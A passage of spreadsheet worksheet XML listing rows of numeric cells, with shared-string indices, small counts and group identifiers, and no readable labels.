      </c>
      <c r="C11675">
        <v>1</v>
      </c>
      <c r="D11675">
        <v>4948</v>
      </c>
    </row>
    <row r="11676" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11676" t="s">
        <v>16231</v>
      </c>
      <c r="B11676" t="s">
        <v>16216</v>
      </c>
      <c r="C11676">
        <v>1</v>
      </c>
      <c r="D11676">
        <v>4948</v>
      </c>
    </row>
    <row r="11677" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11677" t="s">
        <v>16228</v>
      </c>
      <c r="B11677" t="s">
        <v>16217</v>
      </c>
      <c r="C11677">
        <v>0</v>
      </c>
      <c r="D11677">
        <v>4948</v>
      </c>
    </row>
    <row r="11678" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11678" t="s">
        <v>16231</v>
      </c>
      <c r="B11678" t="s">
        <v>16218</v>
      </c>
      <c r="C11678">
        <v>4</v>
      </c>
      <c r="D11678">
        <v>4948</v>
      </c>
    </row>
    <row r="11679" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11679" t="s">
        <v>16229</v>
      </c>
      <c r="B11679" t="s">
        <v>16219</v>
      </c>
      <c r="C11679">
        <v>0</v>
      </c>
      <c r="D11679">
        <v>4948</v>
      </c>
    </row>
    <row r="11680" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11680" t="s">
        <v>16230</v>
      </c>
      <c r="B11680" t="s">
        <v>16220</v>
      </c>
      <c r="C11680">
        <v>0</v>
      </c>
      <c r="D11680">
        <v>4948</v>
      </c>
    </row>
    <row r="11681" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11681" t="s">
        <v>16229</v>
      </c>
      <c r="B11681" t="s">
        <v>16221</v>
      </c>
      <c r="C11681">
        <v>0</v>
      </c>
      <c r="D11681">
        <v>4948</v>
      </c>
    </row>
    <row r="11682" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11682" t="s">
        <v>16230</v>
      </c>
      <c r="B11682" t="s">
        <v>16222</v>
      </c>
      <c r="C11682">
        <v>3</v>
      </c>
      <c r="D11682">
        <v>4948</v>
      </c>
    </row>
    <row r="11683" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11683" t="s">
        <v>16223</v>
      </c>
      <c r="B11683" t="s">
        <v>16223</v>
      </c>
      <c r="C11683">
        <v>28</v>
      </c>
      <c r="D11683">
        <v>4948</v>
      </c>
    </row>
    <row r="11684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11684" t="s">
        <v>16224</v>
      </c>
      <c r="B11684" t="s">
        <v>16224</v>
      </c>
      <c r="C11684">
        <v>1</v>
      </c>
      <c r="D11684">
        <v>4948</v>
      </c>
    </row>
    <row r="11685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11685" t="s">
        <v>16228</v>
      </c>
      <c r="B11685" t="s">
        <v>16211</v>
      </c>
      <c r="C11685">
        <v>0</v>
      </c>
      <c r="D11685">
        <v>4978</v>
      </c>
    </row>
    <row r="11686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11686" t="s">
        <v>16231</v>
      </c>
      <c r="B11686" t="s">
        <v>16212</v>
      </c>
      <c r="C11686">
        <v>0</v>
      </c>
      <c r="D11686">
        <v>4978</v>
      </c>
    </row>
    <row r="11687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11687" t="s">
        <v>16228</v>
      </c>
      <c r="B11687" t="s">
        <v>16213</v>
      </c>
      <c r="C11687">
        <v>0</v>
      </c>
      <c r="D11687">
        <v>4978</v>
      </c>
    </row>
    <row r="11688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11688" t="s">
        <v>16231</v>
      </c>
      <c r="B11688" t="s">
        <v>16214</v>
      </c>
      <c r="C11688">
        <v>0</v>
      </c>
      <c r="D11688">
        <v>4978</v>
      </c>
    </row>
    <row r="11689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11689" t="s">
        <v>16228</v>
      </c>
      <c r="B11689" t="s">
        <v>16215</v>
      </c>
      <c r="C11689">
        <v>1</v>
      </c>
      <c r="D11689">
        <v>4978</v>
      </c>
    </row>
    <row r="11690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11690" t="s">
        <v>16231</v>
      </c>
      <c r="B11690" t="s">
        <v>16216</v>
      </c>
      <c r="C11690">
        <v>1</v>
      </c>
      <c r="D11690">
        <v>4978</v>
      </c>
    </row>
    <row r="11691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11691" t="s">
        <v>16228</v>
      </c>
      <c r="B11691" t="s">
        <v>16217</v>
      </c>
      <c r="C11691">
        <v>0</v>
      </c>
      <c r="D11691">
        <v>4978</v>
      </c>
    </row>
    <row r="11692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11692" t="s">
        <v>16231</v>
      </c>
      <c r="B11692" t="s">
        <v>16218</v>
      </c>
      <c r="C11692">
        <v>0</v>
      </c>
      <c r="D11692">
        <v>4978</v>
      </c>
    </row>
    <row r="11693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11693" t="s">
        <v>16229</v>
      </c>
      <c r="B11693" t="s">
        <v>16219</v>
      </c>
      <c r="C11693">
        <v>0</v>
      </c>
      <c r="D11693">
        <v>4978</v>
      </c>
    </row>
    <row r="11694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11694" t="s">
        <v>16230</v>
      </c>
      <c r="B11694" t="s">
        <v>16220</v>
      </c>
      <c r="C11694">
        <v>0</v>
      </c>
      <c r="D11694">
        <v>4978</v>
      </c>
    </row>
    <row r="11695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11695" t="s">
        <v>16229</v>
      </c>
      <c r="B11695" t="s">
        <v>16221</v>
      </c>
      <c r="C11695">
        <v>3</v>
      </c>
      <c r="D11695">
        <v>4978</v>
      </c>
    </row>
    <row r="11696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11696" t="s">
        <v>16230</v>
      </c>
      <c r="B11696" t="s">
        <v>16222</v>
      </c>
      <c r="C11696">
        <v>20</v>
      </c>
      <c r="D11696">
        <v>4978</v>
      </c>
    </row>
    <row r="11697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11697" t="s">
        <v>16223</v>
      </c>
      <c r="B11697" t="s">
        <v>16223</v>
      </c>
      <c r="C11697">
        <v>26</v>
      </c>
      <c r="D11697">
        <v>4978</v>
      </c>
    </row>
    <row r="11698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11698" t="s">
        <v>16224</v>
      </c>
      <c r="B11698" t="s">
        <v>16224</v>
      </c>
      <c r="C11698">
        <v>0</v>
      </c>
      <c r="D11698">
        <v>4978</v>
      </c>
    </row>
    <row r="11699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11699" t="s">
        <v>16228</v>
      </c>
      <c r="B11699" t="s">
        <v>16211</v>
      </c>
      <c r="C11699">
        <v>0</v>
      </c>
      <c r="D11699">
        <v>4998</v>
      </c>
    </row>
    <row r="11700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11700" t="s">
        <v>16231</v>
      </c>
      <c r="B11700" t="s">
        <v>16212</v>
      </c>
      <c r="C11700">
        <v>0</v>
      </c>
      <c r="D11700">
        <v>4998</v>
      </c>
    </row>
    <row r="11701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11701" t="s">
        <v>16228</v>
      </c>
      <c r="B11701" t="s">
        <v>16213</v>
      </c>
      <c r="C11701">
        <v>0</v>
      </c>
      <c r="D11701">
        <v>4998</v>
      </c>
    </row>
    <row r="11702" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11702" t="s">
        <v>16231</v>
      </c>
      <c r="B11702" t="s">
        <v>16214</v>
      </c>
      <c r="C11702">
        <v>0</v>
      </c>
      <c r="D11702">
        <v>4998</v>
      </c>
    </row>
    <row r="11703" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11703" t="s">
        <v>16228</v>
      </c>
      <c r="B11703" t="s">
        <v>16215</v>
      </c>
      <c r="C11703">
        <v>2</v>
      </c>
      <c r="D11703">
        <v>4998</v>
      </c>
    </row>
    <row r="11704" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11704" t="s">
        <v>16231</v>
      </c>
      <c r="B11704" t="s">
        <v>16216</v>
      </c>
      <c r="C11704">
        <v>2</v>
      </c>
      <c r="D11704">
        <v>4998</v>
      </c>
    </row>
    <row r="11705" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11705" t="s">
        <v>16228</v>
      </c>
      <c r="B11705" t="s">
        <v>16217</v>
      </c>
      <c r="C11705">
        <v>4</v>
      </c>
      <c r="D11705">
        <v>4998</v>
      </c>
    </row>
    <row r="11706" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11706" t="s">
        <v>16231</v>
      </c>
      <c r="B11706" t="s">
        <v>16218</v>
      </c>
      <c r="C11706">
        <v>4</v>
      </c>
      <c r="D11706">
        <v>4998</v>
      </c>
    </row>
    <row r="11707" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11707" t="s">
        <v>16229</v>
      </c>
      <c r="B11707" t="s">
        <v>16219</v>
      </c>
      <c r="C11707">
        <v>2</v>
      </c>
      <c r="D11707">
        <v>4998</v>
      </c>
    </row>
    <row r="11708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11708" t="s">
        <v>16230</v>
      </c>
      <c r="B11708" t="s">
        <v>16220</v>
      </c>
      <c r="C11708">
        <v>2</v>
      </c>
      <c r="D11708">
        <v>4998</v>
      </c>
    </row>
    <row r="11709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11709" t="s">
        <v>16229</v>
      </c>
      <c r="B11709" t="s">
        <v>16221</v>
      </c>
      <c r="C11709">
        <v>2</v>
      </c>
      <c r="D11709">
        <v>4998</v>
      </c>
    </row>
    <row r="11710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11710" t="s">
        <v>16230</v>
      </c>
      <c r="B11710" t="s">
        <v>16222</v>
      </c>
      <c r="C11710">
        <v>10</v>
      </c>
      <c r="D11710">
        <v>4998</v>
      </c>
    </row>
    <row r="11711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11711" t="s">
        <v>16223</v>
      </c>
      <c r="B11711" t="s">
        <v>16223</v>
      </c>
      <c r="C11711">
        <v>6</v>
      </c>
      <c r="D11711">
        <v>4998</v>
      </c>
    </row>
    <row r="11712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11712" t="s">
        <v>16224</v>
      </c>
      <c r="B11712" t="s">
        <v>16224</v>
      </c>
      <c r="C11712">
        <v>0</v>
      </c>
      <c r="D11712">
        <v>4998</v>
      </c>
    </row>
    <row r="11713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11713" t="s">
        <v>16228</v>
      </c>
      <c r="B11713" t="s">
        <v>16211</v>
      </c>
      <c r="C11713">
        <v>2</v>
      </c>
      <c r="D11713">
        <v>660</v>
      </c>
    </row>
    <row r="11714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11714" t="s">
        <v>16231</v>
      </c>
      <c r="B11714" t="s">
        <v>16212</v>
      </c>
      <c r="C11714">
        <v>0</v>
      </c>
      <c r="D11714">
        <v>660</v>
      </c>
    </row>
    <row r="11715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11715" t="s">
        <v>16228</v>
      </c>
      <c r="B11715" t="s">
        <v>16213</v>
      </c>
      <c r="C11715">
        <v>0</v>
      </c>
      <c r="D11715">
        <v>660</v>
      </c>
    </row>
    <row r="11716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11716" t="s">
        <v>16231</v>
      </c>
      <c r="B11716" t="s">
        <v>16214</v>
      </c>
      <c r="C11716">
        <v>0</v>
      </c>
      <c r="D11716">
        <v>660</v>
      </c>
    </row>
    <row r="11717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11717" t="s">
        <v>16228</v>
      </c>
      <c r="B11717" t="s">
        <v>16215</v>
      </c>
      <c r="C11717">
        <v>6</v>
      </c>
      <c r="D11717">
        <v>660</v>
      </c>
    </row>
    <row r="11718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11718" t="s">
        <v>16231</v>
      </c>
      <c r="B11718" t="s">
        <v>16216</v>
      </c>
      <c r="C11718">
        <v>17</v>
      </c>
      <c r="D11718">
        <v>660</v>
      </c>
    </row>
    <row r="11719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11719" t="s">
        <v>16228</v>
      </c>
      <c r="B11719" t="s">
        <v>16217</v>
      </c>
      <c r="C11719">
        <v>50</v>
      </c>
      <c r="D11719">
        <v>660</v>
      </c>
    </row>
    <row r="11720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11720" t="s">
        <v>16231</v>
      </c>
      <c r="B11720" t="s">
        <v>16218</v>
      </c>
      <c r="C11720">
        <v>120</v>
      </c>
      <c r="D11720">
        <v>660</v>
      </c>
    </row>
    <row r="11721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11721" t="s">
        <v>16229</v>
      </c>
      <c r="B11721" t="s">
        <v>16219</v>
      </c>
      <c r="C11721">
        <v>0</v>
      </c>
      <c r="D11721">
        <v>660</v>
      </c>
    </row>
    <row r="11722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11722" t="s">
        <v>16230</v>
      </c>
      <c r="B11722" t="s">
        <v>16220</v>
      </c>
      <c r="C11722">
        <v>0</v>
      </c>
      <c r="D11722">
        <v>660</v>
      </c>
    </row>
    <row r="11723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11723" t="s">
        <v>16229</v>
      </c>
      <c r="B11723" t="s">
        <v>16221</v>
      </c>
      <c r="C11723">
        <v>20</v>
      </c>
      <c r="D11723">
        <v>660</v>
      </c>
    </row>
    <row r="11724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11724" t="s">
        <v>16230</v>
      </c>
      <c r="B11724" t="s">
        <v>16222</v>
      </c>
      <c r="C11724">
        <v>300</v>
      </c>
      <c r="D11724">
        <v>660</v>
      </c>
    </row>
    <row r="11725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11725" t="s">
        <v>16223</v>
      </c>
      <c r="B11725" t="s">
        <v>16223</v>
      </c>
      <c r="C11725">
        <v>0</v>
      </c>
      <c r="D11725">
        <v>660</v>
      </c>
    </row>
    <row r="11726" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11726" t="s">
        <v>16224</v>
      </c>
      <c r="B11726" t="s">
        <v>16224</v>
      </c>
      <c r="C11726">
        <v>0</v>
      </c>
      <c r="D11726">
        <v>660</v>
      </c>
    </row>
    <row r="11727" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11727" t="s">
        <v>16228</v>
      </c>
      <c r="B11727" t="s">
        <v>16211</v>
      </c>
      <c r="C11727">
        <v>0</v>
      </c>
      <c r="D11727">
        <v>761</v>
      </c>
    </row>
    <row r="11728" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11728" t="s">
        <v>16231</v>
      </c>
      <c r="B11728" t="s">
        <v>16212</v>
      </c>
      <c r="C11728">
        <v>0</v>
      </c>
      <c r="D11728">
        <v>761</v>
      </c>
    </row>
    <row r="11729" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11729" t="s">
        <v>16228</v>
      </c>
      <c r="B11729" t="s">
        <v>16213</v>
      </c>
      <c r="C11729">
        <v>0</v>
      </c>
      <c r="D11729">
        <v>761</v>
      </c>
    </row>
    <row r="11730" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11730" t="s">
        <v>16231</v>
      </c>
      <c r="B11730" t="s">
        <v>16214</v>
      </c>
      <c r="C11730">
        <v>0</v>
      </c>
      <c r="D11730">
        <v>761</v>
      </c>
    </row>
    <row r="11731" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11731" t="s">
        <v>16228</v>
      </c>
      <c r="B11731" t="s">
        <v>16215</v>
      </c>
      <c r="C11731">
        <v>1</v>
      </c>
      <c r="D11731">
        <v>761</v>
      </c>
    </row>
    <row r="11732" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11732" t="s">
        <v>16231</v>
      </c>
      <c r="B11732" t="s">
        <v>16216</v>
      </c>
      <c r="C11732">
        <v>1</v>
      </c>
      <c r="D11732">
        <v>761</v>
      </c>
    </row>
    <row r="11733" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11733" t="s">
        <v>16228</v>
      </c>
      <c r="B11733" t="s">
        <v>16217</v>
      </c>
      <c r="C11733">
        <v>4</v>
      </c>
      <c r="D11733">
        <v>761</v>
      </c>
    </row>
    <row r="11734" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11734" t="s">
        <v>16231</v>
      </c>
      <c r="B11734" t="s">
        <v>16218</v>
      </c>
      <c r="C11734">
        <v>0</v>
      </c>
      <c r="D11734">
        <v>761</v>
      </c>
    </row>
    <row r="11735" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11735" t="s">
        <v>16229</v>
      </c>
      <c r="B11735" t="s">
        <v>16219</v>
      </c>
      <c r="C11735">
        <v>0</v>
      </c>
      <c r="D11735">
        <v>761</v>
      </c>
    </row>
    <row r="11736" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11736" t="s">
        <v>16230</v>
      </c>
      <c r="B11736" t="s">
        <v>16220</v>
      </c>
      <c r="C11736">
        <v>0</v>
      </c>
      <c r="D11736">
        <v>761</v>
      </c>
    </row>
    <row r="11737" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11737" t="s">
        <v>16229</v>
      </c>
      <c r="B11737" t="s">
        <v>16221</v>
      </c>
      <c r="C11737">
        <v>0</v>
      </c>
      <c r="D11737">
        <v>761</v>
      </c>
    </row>
    <row r="11738" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11738" t="s">
        <v>16230</v>
      </c>
      <c r="B11738" t="s">
        <v>16222</v>
      </c>
      <c r="C11738">
        <v>0</v>
      </c>
      <c r="D11738">
        <v>761</v>
      </c>
    </row>
    <row r="11739" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11739" t="s">
        <v>16223</v>
      </c>
      <c r="B11739" t="s">
        <v>16223</v>
      </c>
      <c r="C11739">
        <v>10</v>
      </c>
      <c r="D11739">
        <v>761</v>
      </c>
    </row>
    <row r="11740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11740" t="s">
        <v>16224</v>
      </c>
      <c r="B11740" t="s">
        <v>16224</v>
      </c>
      <c r="C11740">
        <v>2</v>
      </c>
      <c r="D11740">
        <v>761</v>
      </c>
    </row>
    <row r="11741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11741" t="s">
        <v>16228</v>
      </c>
      <c r="B11741" t="s">
        <v>16215</v>
      </c>
      <c r="C11741">
        <v>2</v>
      </c>
      <c r="D11741">
        <v>1144</v>
      </c>
    </row>
    <row r="11742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11742" t="s">
        <v>16231</v>
      </c>
      <c r="B11742" t="s">
        <v>16216</v>
      </c>
      <c r="C11742">
        <v>2</v>
      </c>
      <c r="D11742">
        <v>1144</v>
      </c>
    </row>
    <row r="11743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11743" t="s">
        <v>16228</v>
      </c>
      <c r="B11743" t="s">
        <v>16217</v>
      </c>
      <c r="C11743">
        <v>0</v>
      </c>
      <c r="D11743">
        <v>1144</v>
      </c>
    </row>
    <row r="11744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11744" t="s">
        <v>16231</v>
      </c>
      <c r="B11744" t="s">
        <v>16218</v>
      </c>
      <c r="C11744">
        <v>0</v>
      </c>
      <c r="D11744">
        <v>1144</v>
      </c>
    </row>
    <row r="11745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11745" t="s">
        <v>16229</v>
      </c>
      <c r="B11745" t="s">
        <v>16221</v>
      </c>
      <c r="C11745">
        <v>12</v>
      </c>
      <c r="D11745">
        <v>1144</v>
      </c>
    </row>
    <row r="11746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11746" t="s">
        <v>16230</v>
      </c>
      <c r="B11746" t="s">
        <v>16222</v>
      </c>
      <c r="C11746">
        <v>18</v>
      </c>
      <c r="D11746">
        <v>1144</v>
      </c>
    </row>
    <row r="11747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11747" t="s">
        <v>16223</v>
      </c>
      <c r="B11747" t="s">
        <v>16223</v>
      </c>
      <c r="C11747">
        <v>30</v>
      </c>
      <c r="D11747">
        <v>1144</v>
      </c>
    </row>
    <row r="11748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11748" t="s">
        <v>16228</v>
      </c>
      <c r="B11748" t="s">
        <v>16211</v>
      </c>
      <c r="C11748">
        <v>0</v>
      </c>
      <c r="D11748">
        <v>739</v>
      </c>
    </row>
    <row r="11749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11749" t="s">
        <v>16231</v>
      </c>
      <c r="B11749" t="s">
        <v>16212</v>
      </c>
      <c r="C11749">
        <v>0</v>
      </c>
      <c r="D11749">
        <v>739</v>
      </c>
    </row>
    <row r="11750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11750" t="s">
        <v>16228</v>
      </c>
      <c r="B11750" t="s">
        <v>16213</v>
      </c>
      <c r="C11750">
        <v>0</v>
      </c>
      <c r="D11750">
        <v>739</v>
      </c>
    </row>
    <row r="11751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11751" t="s">
        <v>16231</v>
      </c>
      <c r="B11751" t="s">
        <v>16214</v>
      </c>
      <c r="C11751">
        <v>0</v>
      </c>
      <c r="D11751">
        <v>739</v>
      </c>
    </row>
    <row r="11752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11752" t="s">
        <v>16228</v>
      </c>
      <c r="B11752" t="s">
        <v>16215</v>
      </c>
      <c r="C11752">
        <v>6</v>
      </c>
      <c r="D11752">
        <v>739</v>
      </c>
    </row>
    <row r="11753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11753" t="s">
        <v>16231</v>
      </c>
      <c r="B11753" t="s">
        <v>16216</v>
      </c>
      <c r="C11753">
        <v>7</v>
      </c>
      <c r="D11753">
        <v>739</v>
      </c>
    </row>
    <row r="11754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11754" t="s">
        <v>16228</v>
      </c>
      <c r="B11754" t="s">
        <v>16217</v>
      </c>
      <c r="C11754">
        <v>114</v>
      </c>
      <c r="D11754">
        <v>739</v>
      </c>
    </row>
    <row r="11755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11755" t="s">
        <v>16231</v>
      </c>
      <c r="B11755" t="s">
        <v>16218</v>
      </c>
      <c r="C11755">
        <v>213</v>
      </c>
      <c r="D11755">
        <v>739</v>
      </c>
    </row>
    <row r="11756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11756" t="s">
        <v>16229</v>
      </c>
      <c r="B11756" t="s">
        <v>16219</v>
      </c>
      <c r="C11756">
        <v>0</v>
      </c>
      <c r="D11756">
        <v>739</v>
      </c>
    </row>
    <row r="11757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11757" t="s">
        <v>16230</v>
      </c>
      <c r="B11757" t="s">
        <v>16220</v>
      </c>
      <c r="C11757">
        <v>3</v>
      </c>
      <c r="D11757">
        <v>739</v>
      </c>
    </row>
    <row r="11758" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11758" t="s">
        <v>16229</v>
      </c>
      <c r="B11758" t="s">
        <v>16221</v>
      </c>
      <c r="C11758">
        <v>100</v>
      </c>
      <c r="D11758">
        <v>739</v>
      </c>
    </row>
    <row r="11759" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11759" t="s">
        <v>16230</v>
      </c>
      <c r="B11759" t="s">
        <v>16222</v>
      </c>
      <c r="C11759">
        <v>161</v>
      </c>
      <c r="D11759">
        <v>739</v>
      </c>
    </row>
    <row r="11760" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11760" t="s">
        <v>16223</v>
      </c>
      <c r="B11760" t="s">
        <v>16223</v>
      </c>
      <c r="C11760">
        <v>24</v>
      </c>
      <c r="D11760">
        <v>739</v>
      </c>
    </row>
    <row r="11761" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11761" t="s">
        <v>16224</v>
      </c>
      <c r="B11761" t="s">
        <v>16224</v>
      </c>
      <c r="C11761">
        <v>2</v>
      </c>
      <c r="D11761">
        <v>739</v>
      </c>
    </row>
    <row r="11762" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11762" t="s">
        <v>16228</v>
      </c>
      <c r="B11762" t="s">
        <v>16211</v>
      </c>
      <c r="C11762">
        <v>0</v>
      </c>
      <c r="D11762">
        <v>979</v>
      </c>
    </row>
    <row r="11763" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11763" t="s">
        <v>16231</v>
      </c>
      <c r="B11763" t="s">
        <v>16212</v>
      </c>
      <c r="C11763">
        <v>0</v>
      </c>
      <c r="D11763">
        <v>979</v>
      </c>
    </row>
    <row r="11764" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11764" t="s">
        <v>16228</v>
      </c>
      <c r="B11764" t="s">
        <v>16213</v>
      </c>
      <c r="C11764">
        <v>0</v>
      </c>
      <c r="D11764">
        <v>979</v>
      </c>
    </row>
    <row r="11765" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11765" t="s">
        <v>16231</v>
      </c>
      <c r="B11765" t="s">
        <v>16214</v>
      </c>
      <c r="C11765">
        <v>0</v>
      </c>
      <c r="D11765">
        <v>979</v>
      </c>
    </row>
    <row r="11766" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11766" t="s">
        <v>16228</v>
      </c>
      <c r="B11766" t="s">
        <v>16215</v>
      </c>
      <c r="C11766">
        <v>2</v>
      </c>
      <c r="D11766">
        <v>979</v>
      </c>
    </row>
    <row r="11767" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11767" t="s">
        <v>16231</v>
      </c>
      <c r="B11767" t="s">
        <v>16216</v>
      </c>
      <c r="C11767">
        <v>2</v>
      </c>
      <c r="D11767">
        <v>979</v>
      </c>
    </row>
    <row r="11768" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11768" t="s">
        <v>16228</v>
      </c>
      <c r="B11768" t="s">
        <v>16217</v>
      </c>
      <c r="C11768">
        <v>20</v>
      </c>
      <c r="D11768">
        <v>979</v>
      </c>
    </row>
    <row r="11769" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11769" t="s">
        <v>16231</v>
      </c>
      <c r="B11769" t="s">
        <v>16218</v>
      </c>
      <c r="C11769">
        <v>6</v>
      </c>
      <c r="D11769">
        <v>979</v>
      </c>
    </row>
    <row r="11770" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11770" t="s">
        <v>16229</v>
      </c>
      <c r="B11770" t="s">
        <v>16219</v>
      </c>
      <c r="C11770">
        <v>0</v>
      </c>
      <c r="D11770">
        <v>979</v>
      </c>
    </row>
    <row r="11771" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11771" t="s">
        <v>16230</v>
      </c>
      <c r="B11771" t="s">
        <v>16220</v>
      </c>
      <c r="C11771">
        <v>0</v>
      </c>
      <c r="D11771">
        <v>979</v>
      </c>
    </row>
    <row r="11772" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11772" t="s">
        <v>16229</v>
      </c>
      <c r="B11772" t="s">
        <v>16221</v>
      </c>
      <c r="C11772">
        <v>0</v>
      </c>
      <c r="D11772">
        <v>979</v>
      </c>
    </row>
    <row r="11773" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11773" t="s">
        <v>16230</v>
      </c>
      <c r="B11773" t="s">
        <v>16222</v>
      </c>
      <c r="C11773">
        <v>0</v>
      </c>
      <c r="D11773">
        <v>979</v>
      </c>
    </row>
    <row r="11774" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11774" t="s">
        <v>16223</v>
      </c>
      <c r="B11774" t="s">
        <v>16223</v>
      </c>
      <c r="C11774">
        <v>26</v>
      </c>
      <c r="D11774">
        <v>979</v>
      </c>
    </row>
    <row r="11775" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11775" t="s">
        <v>16224</v>
      </c>
      <c r="B11775" t="s">
        <v>16224</v>
      </c>
      <c r="C11775">
        <v>0</v>
      </c>
      <c r="D11775">
        <v>979</v>
      </c>
    </row>
    <row r="11776" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11776" t="s">
        <v>16228</v>
      </c>
      <c r="B11776" t="s">
        <v>16213</v>
      </c>
      <c r="C11776">
        <v>0</v>
      </c>
      <c r="D11776">
        <v>664</v>
      </c>
    </row>
    <row r="11777" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11777" t="s">
        <v>16228</v>
      </c>
      <c r="B11777" t="s">
        <v>16215</v>
      </c>
      <c r="C11777">
        <v>10</v>
      </c>
      <c r="D11777">
        <v>664</v>
      </c>
    </row>
    <row r="11778" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11778" t="s">
        <v>16228</v>
      </c>
      <c r="B11778" t="s">
        <v>16217</v>
      </c>
      <c r="C11778">
        <v>10</v>
      </c>
      <c r="D11778">
        <v>664</v>
      </c>
    </row>
    <row r="11779" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11779" t="s">
        <v>16228</v>
      </c>
      <c r="B11779" t="s">
        <v>16211</v>
      </c>
      <c r="C11779">
        <v>0</v>
      </c>
      <c r="D11779">
        <v>1295</v>
      </c>
    </row>
    <row r="11780" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11780" t="s">
        <v>16231</v>
      </c>
      <c r="B11780" t="s">
        <v>16212</v>
      </c>
      <c r="C11780">
        <v>0</v>
      </c>
      <c r="D11780">
